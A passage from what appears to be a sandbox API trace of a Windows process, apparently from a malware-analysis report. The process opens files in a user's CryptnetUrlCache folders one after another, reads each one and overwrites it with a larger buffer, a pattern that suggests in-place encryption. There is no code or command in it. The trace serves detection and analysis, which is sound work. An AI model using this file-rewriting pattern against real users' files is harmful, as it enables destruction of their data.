dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.343] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1d8 [0155.343] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.344] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.344] ReleaseMutex (hMutex=0x168) returned 1 [0155.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0155.344] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", cchWideChar=65, lpMultiByteStr=0x1fac65c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpUsedDefaultChar=0x0) returned 65 [0155.344] ReadFile (in: hFile=0x1d4, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1d8, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x2b1f2bc*=0x1d8, lpOverlapped=0x0) returned 1 [0155.345] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0155.345] WriteFile (in: hFile=0x1d4, lpBuffer=0x2897ac8*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2897ac8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x760, lpOverlapped=0x0) returned 1 [0155.346] CloseHandle (hObject=0x1d4) returned 1 [0155.346] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0155.348] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.348] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x2d7 [0155.348] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.348] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.348] ReleaseMutex (hMutex=0x168) returned 1 [0155.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0155.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", cchWideChar=65, lpMultiByteStr=0x1fac65c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpUsedDefaultChar=0x0) returned 65 [0155.348] ReadFile (in: hFile=0x1d4, lpBuffer=0x288f968, nNumberOfBytesToRead=0x2d7, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesRead=0x2b1f2bc*=0x2d7, lpOverlapped=0x0) returned 1 [0155.360] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0155.360] WriteFile (in: hFile=0x1d4, lpBuffer=0x2897ac8*, nNumberOfBytesToWrite=0x85f, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2897ac8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x85f, lpOverlapped=0x0) returned 1 [0155.360] CloseHandle (hObject=0x1d4) returned 1 [0155.361] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0155.362] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.362] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x67c [0155.362] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.362] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.362] ReleaseMutex (hMutex=0x168) returned 1 [0155.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0155.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", cchWideChar=65, lpMultiByteStr=0x1fac65c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpUsedDefaultChar=0x0) returned 65 [0155.362] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a8bc8, nNumberOfBytesToRead=0x67c, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a8bc8*, lpNumberOfBytesRead=0x2b1f2bc*=0x67c, lpOverlapped=0x0) returned 1 [0155.364] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0155.364] WriteFile (in: hFile=0x1d4, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0xc04, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2b1f2d0*=0xc04, lpOverlapped=0x0) returned 1 [0155.365] CloseHandle (hObject=0x1d4) returned 1 [0155.365] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0155.367] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.367] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1cf [0155.367] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.367] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.368] ReleaseMutex (hMutex=0x168) returned 1 [0155.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0155.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", cchWideChar=65, lpMultiByteStr=0x1fac65c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpUsedDefaultChar=0x0) returned 65 [0155.368] ReadFile (in: hFile=0x1d4, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1cf, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x2b1f2bc*=0x1cf, lpOverlapped=0x0) returned 1 [0155.369] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0155.369] WriteFile (in: hFile=0x1d4, lpBuffer=0x2897ac8*, nNumberOfBytesToWrite=0x757, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2897ac8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x757, lpOverlapped=0x0) returned 1 [0155.370] CloseHandle (hObject=0x1d4) returned 1 [0155.370] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0155.371] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.371] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x59d [0155.371] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.371] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.371] ReleaseMutex (hMutex=0x168) returned 1 [0155.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0155.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", cchWideChar=65, lpMultiByteStr=0x1fac65c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpUsedDefaultChar=0x0) returned 65 [0155.372] ReadFile (in: hFile=0x1d4, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x59d, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x2b1f2bc*=0x59d, lpOverlapped=0x0) returned 1 [0155.374] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0155.375] WriteFile (in: hFile=0x1d4, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0xb25, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2b1f2d0*=0xb25, lpOverlapped=0x0) returned 1 [0155.375] CloseHandle (hObject=0x1d4) returned 1 [0155.375] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0155.376] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.376] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x652 [0155.376] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.376] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.376] ReleaseMutex (hMutex=0x168) returned 1 [0155.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0155.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", cchWideChar=65, lpMultiByteStr=0x1fac65c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpUsedDefaultChar=0x0) returned 65 [0155.376] ReadFile (in: hFile=0x1d4, lpBuffer=0x26cf048, nNumberOfBytesToRead=0x652, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesRead=0x2b1f2bc*=0x652, lpOverlapped=0x0) returned 1 [0155.378] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0155.379] WriteFile (in: hFile=0x1d4, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0xbda, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2b1f2d0*=0xbda, lpOverlapped=0x0) returned 1 [0155.379] CloseHandle (hObject=0x1d4) returned 1 [0155.379] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0155.380] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.380] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x5ae [0155.381] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0155.381] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.381] ReleaseMutex (hMutex=0x168) returned 1 [0155.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0155.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", cchWideChar=65, lpMultiByteStr=0x1fac65c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpUsedDefaultChar=0x0) returned 65 [0155.381] ReadFile (in: hFile=0x1d4, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x5ae, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x2b1f2bc*=0x5ae, lpOverlapped=0x0) returned 1 [0156.165] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0156.166] WriteFile (in: hFile=0x1d4, lpBuffer=0x2870fb8*, nNumberOfBytesToWrite=0xb36, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870fb8*, lpNumberOfBytesWritten=0x2b1f2d0*=0xb36, lpOverlapped=0x0) returned 1 [0156.166] CloseHandle (hObject=0x1d4) returned 1 [0156.166] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1daf2884ec4dfa96ba4a58d4dbc9c406"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0156.168] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0156.168] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x10c [0156.168] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0156.168] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0156.168] ReleaseMutex (hMutex=0x168) returned 1 [0156.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="1DAF2884EC4DFA96BA4A58D4DBC9C406", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0156.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="1DAF2884EC4DFA96BA4A58D4DBC9C406", cchWideChar=32, lpMultiByteStr=0x1fa55f4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpUsedDefaultChar=0x0) returned 32 [0156.168] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ef2a38, nNumberOfBytesToRead=0x10c, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a38*, lpNumberOfBytesRead=0x2b1f2bc*=0x10c, lpOverlapped=0x0) returned 1 [0156.170] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0156.170] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x694, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x2b1f2d0*=0x694, lpOverlapped=0x0) returned 1 [0156.170] CloseHandle (hObject=0x1d4) returned 1 [0156.171] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0156.829] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0156.829] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x190 [0156.829] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0156.829] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0156.829] ReleaseMutex (hMutex=0x168) returned 1 [0156.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0156.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", cchWideChar=65, lpMultiByteStr=0x1fac974, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpUsedDefaultChar=0x0) returned 65 [0156.829] ReadFile (in: hFile=0x1d4, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x190, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x2b1f2bc*=0x190, lpOverlapped=0x0) returned 1 [0156.830] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0156.831] WriteFile (in: hFile=0x1d4, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x718, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x2b1f2d0*=0x718, lpOverlapped=0x0) returned 1 [0156.831] CloseHandle (hObject=0x1d4) returned 1 [0156.831] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0156.832] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0156.832] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x194 [0156.832] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0156.832] WaitForSingleObject (hHandle=0x168, 